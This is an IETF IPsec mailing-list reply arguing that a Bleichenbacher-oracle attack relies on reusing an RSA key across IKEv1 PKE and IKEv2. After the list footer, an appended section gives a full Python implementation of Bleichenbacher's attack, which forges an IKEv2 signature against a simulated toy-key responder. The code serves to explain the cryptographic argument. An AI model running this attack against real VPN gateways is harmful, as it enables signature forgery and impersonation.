Hi Scott,

> Their argument is 'if you use the same RSA key for IKEv1 PKE authentication,
> *and* IKEv2 authentication, then
> you can use the Bleichenbacher Oracle within IKEv1 to attack a current IKEv2
> exchange' (see section 4.4 of the
> paper).
So, this is not an attack against IKEv2 per se. Without running IKEv1 code with (R)PKE enabled the attack is impossible. So in my opinion the authors are not accurate in claiming that this is an attack against IKEv2 - after breaking RSA with the Bleichenbacher Oracle in IKEv1 PKE mode they can use the results against *any* protocol that reuses the broken key, can't they?

Is there any weakness in IKEv2 as a protocol except that its RSA key is usually the same as in IKEv1? I believe the authors didn't demonstrate such a weakness...

Regards,
Valery.

_______________________________________________
IPsec mailing list
[email protected]
https://www.ietf.org/mailman/listinfo/ipsec
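A worked model of the cross-protocol key reuse discussed in this thread, added here as an illustration; it is not code from the paper or from any IKE implementation, and the names (Responder, sig_encode, forge_ikev2_signature and so on) are mine. It assumes a constructed 234-bit toy RSA key built from two Mersenne primes, an IKEv1 PKE responder whose decryption leaks only whether the PKCS#1 v1.5 block begins with 00 02, and a simplified IKEv2 signature encoding (truncated SHA-256, no DigestInfo, because the toy modulus is too short for the real one); IKE message formats themselves are not modelled. Under those assumptions it shows both halves of the argument at once: Bleichenbacher's algorithm (CRYPTO 1998) turns the IKEv1 PKE oracle into an RSA private-key operation, and feeding it the to-be-signed IKEv2 block returns exactly the signature the gateway would compute, which is why the result applies to any protocol that verifies under the reused key.

```python
"""Added example: a single RSA key serving IKEv1 (R)PKE and IKEv2 (toy model)."""
import hashlib
import random

# Toy RSA key from two Mersenne primes (234-bit modulus; constructed, NOT secure).
P, Q = (1 << 127) - 1, (1 << 107) - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
PUB = (N, E)
K = (N.bit_length() + 7) // 8   # modulus length in bytes (30)
B = 1 << (8 * (K - 2))          # block starts with 00 02  <=>  2B <= m < 3B

def ceil_div(a, b):
    return -(-a // b)

class Responder:
    """Hypothetical gateway speaking IKEv1 (R)PKE and IKEv2 with the same key."""
    queries = 0

    def ikev1_pke_decrypt(self, c):
        """IKEv1 PKE: RSA-decrypt the peer's nonce block (00 02 PS 00 nonce); None
        if malformed. The peer can tell the outcomes apart: that is the oracle.
        Simplified: only the 00 02 prefix is checked, so conforming == 2B<=m<3B."""
        self.queries += 1
        em = pow(c, D, N).to_bytes(K, "big")
        if em[:2] != b"\x00\x02":
            return None
        sep = em.find(b"\x00", 2)
        return em[sep + 1:] if sep != -1 else b""

    def ikev2_sign(self, signed_octets):
        """IKEv2 AUTH: PKCS#1 v1.5 signature with the *same* private key."""
        return pow(int.from_bytes(sig_encode(signed_octets), "big"), D, N)

def sig_encode(signed_octets):
    """PKCS#1 v1.5 type-1 block (00 01 FF..FF 00 hash). Simplified: truncated
    SHA-256, no DigestInfo; the toy modulus is too short for the real encoding."""
    h = hashlib.sha256(signed_octets).digest()[:16]
    return b"\x00\x01" + b"\xff" * (K - 3 - len(h)) + b"\x00" + h

def ikev2_verify(pub, signed_octets, sig):
    return pow(sig, pub[1], pub[0]).to_bytes(K, "big") == sig_encode(signed_octets)

def merge(intervals):
    out = []
    for a, b in sorted(intervals):
        if out and a <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], b))
        else:
            out.append((a, b))
    return out

def bleichenbacher(pub, oracle, c, rng):
    """Recover c^d mod n from oracle(x) == 'x^d mod n starts with 00 02' (CRYPTO '98).
    c need not be a genuine ciphertext: any value's private-key image comes out."""
    n, e = pub
    ok = lambda base, s: oracle(base * pow(s, e, n) % n)
    s0 = 1                                  # step 1: blinding
    while not ok(c, s0):
        s0 = rng.randrange(2, n)
    c0 = c * pow(s0, e, n) % n
    M, s, first = [(2 * B, 3 * B - 1)], ceil_div(n, 3 * B), True
    while True:
        if first or len(M) > 1:             # step 2a / 2b: linear search for s
            s, first = s + (0 if first else 1), False
            while not ok(c0, s):
                s += 1
        else:                               # step 2c: one interval, halve it
            a, b = M[0]
            r, found = ceil_div(2 * (b * s - 2 * B), n), False
            while not found:
                lo, hi = ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                for s in range(lo, hi + 1):
                    if ok(c0, s):
                        found = True
                        break
                r += 1
        new = []                            # step 3: narrow every interval
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:   # step 4: unblind and return
            return M[0][0] * pow(s0, -1, n) % n

def forge_ikev2_signature(pub, gw, signed_octets, rng):
    """Attacker: no private key, only the IKEv1 PKE decrypt oracle. The to-be-signed
    block goes in as a 'ciphertext'; what comes back is the gateway's signature."""
    oracle = lambda x: gw.ikev1_pke_decrypt(x) is not None
    return bleichenbacher(pub, oracle, int.from_bytes(sig_encode(signed_octets), "big"), rng)

def run_attack(signed_octets=b"IKEv2 signed octets chosen by the attacker (constructed)"):
    """Returns (forgery verifies, equals the gateway's own signature, oracle queries)."""
    gw = Responder()
    sig = forge_ikev2_signature(PUB, gw, signed_octets, random.Random(2018))
    return ikev2_verify(PUB, signed_octets, sig), sig == gw.ikev2_sign(signed_octets), gw.queries
```

run_attack() needs Python 3.8 or later (modular inverse via pow) and returns (True, True, q), where q is the number of IKEv1 PKE decryptions the attacker caused, in the low thousands for this key size. A real PKE responder may be stricter than the 00 02 check (for example also requiring the 00 separator) or noisier, which raises the query count but not the outcome. Note that no IKEv2 message is ever malformed or replayed: the only ingredient taken from IKEv2 is that its signature verifies under the key the IKEv1 PKE side is willing to apply to attacker-chosen input.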
